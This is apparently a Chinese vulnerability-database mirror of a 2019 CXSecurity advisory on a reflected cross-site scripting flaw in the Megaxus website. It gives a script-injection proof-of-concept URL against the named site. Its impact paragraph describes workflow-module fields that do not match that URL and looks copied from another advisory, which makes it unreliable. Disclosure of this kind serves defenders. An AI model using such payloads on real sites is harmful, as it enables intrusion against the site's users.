Megaxus Reflectied XSS - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1468791 漏洞类型
发布时间 2019-02-03 更新时间 2019-02-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019020032
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title : Reflectied XSS in Megaxus
# Author : Mukhammad Akbar // https://abaykan.com
# Author Contact : abay.kan2301@gmail.com
# Tested On : Windows and Mac OS
# Category : WebApps
# Exploit Risk : Medium



# Impact :
*********

Cross-Site Scripting issues affecting multiple fields in the workflow module under job edit form by injecting javascript code in the Arguments, Invocation String, and File Extension field, the input from these fields are rendered in the Execution Preview which is the sink of this vulnerability.



# Reflectied XSS :
****************************

http://www.megaxus.com/olimpiade/report/megaxus-olimpiade_{{payload_here}}-2010
http://www.megaxus.com/olimpiade/report/megaxus-olimpiade_</script><script>alert(document.domain)</script>-2010